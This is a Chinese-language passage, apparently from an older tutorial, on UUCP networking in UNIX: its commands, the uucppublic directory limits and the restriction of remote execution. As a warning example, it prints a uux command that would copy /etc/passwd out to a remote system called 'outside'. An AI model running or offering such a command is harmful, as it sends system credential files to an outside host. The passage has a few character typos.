本文主要討論網絡和數據通訊安全,分為六個部分.第一部分概述最大,最老的UNIX網絡UUCP系統;第二部分討論UUCP的安全;第三部分討論新HONEY DANBER UUCP及安全特點;第四部分討論其它的UNIX網絡,其中包括RJE和NSC;第五部分討論通訊的物理安全;最后一部分討論Sun Microsystem公司的Sun OS系統的網絡安全.
1.UUCP系統概述
UUCP系統是一組程序,完成文件傳輸,執行系統之間的命令,維護系統使用情況的統計,保護安全.UUCP是UNIX系統最廣泛使用的網絡實用系統,這其中在兩個原因:第一,UUCP是各種UNIX版本都可用的唯一的標準網絡系統,第二,UUCP是最便宜的網絡系統.只需要一根電纜連接兩個系統,然后就可建立UUCP.如果需要在相距數百或數千公里遠的兩個系統間傳輸數據,中需要兩個具有撥號功能的調制
解調器.
(1)UUCP命令
UUCP命令之一是uucp,該命令用于兩系統間的文件傳輸,uucp命令格式類似于cp命令的格式,只是uucp允許用戶有系統間拷貝文件,命令的一般格式如下:
uucp source_file destination_file
|
source_file通常是本系統的文件(但不必一定是),destination_file通常是另一系統的文件或目錄.指定destination_file的格式為:
system!filename或system!directory.
|
uucp給系統管理員提供了一個選項,可以限制傳入和傳出本系統的uucp文件只能傳到/usr/spool/uucppublic目錄結構中.若告訴uucp將傳輸的文件存放在其他目錄中,系統將會送回一個郵件:remote access to path / file
denied. uucp允許以簡化符號~代替/usr/spool/uucppublic/.如:
uucp names remote!~/john/names
|
有時也可用uucp將文件從另一個系統拷貝到本系統,只要將要傳入本系統的文件指定為源文件(用system!file)即可,如:
uucp remotes!/usr/john/file1 file1
|
如果在遠地機限制了文件傳輸的目錄,上條命令不能拷貝到文件.拷貝文件到本系統的最安全的方法是:在兩個系統上都通過uucppublic目錄進行文件傳輸:
uucp remotes!~/john/file1 ~/pat/file1
|
(2)uux命令
uux命令可用于在另一個系統上執行命令,這一特點稱為"遠程命令仞行".
uux最通常的用處是在系統之間發送郵件(mail在其內部執行uux).典型的uux 請求如下:
pr listing| uux - "remote1!lp -d pr1"
|
這條命令將文件listing格式編排后,再連接到系統remote1的打印機pr1上打印出來.uux的選項"-"使uux將本命令的標準輸入設備建立為遠程命令的標準輸入設備.當若干個系統中只有一個系統連接了打印機時,常用uux打印文
件.
當然必須嚴格地限制遠程命令招待,以保護系統安全.如:
本系統不應允許其它系統上的用戶運行下面的命令:
uux "yoursys!uucp yoursys!/etc/passwd (outside!~/passwd)"
|
這條命令將使本系統傳送/etc/passwd文件到系統outside上,一般地,只有幾條命令允許地執行.rmail是加限制的mail程序,常常為允許通過uux執行的命令之一.也允許rnews(加限制的netnews偽脫機命令)在運行netnews的系統上執行,還允許lp在提供了打印設備的系統上運行.
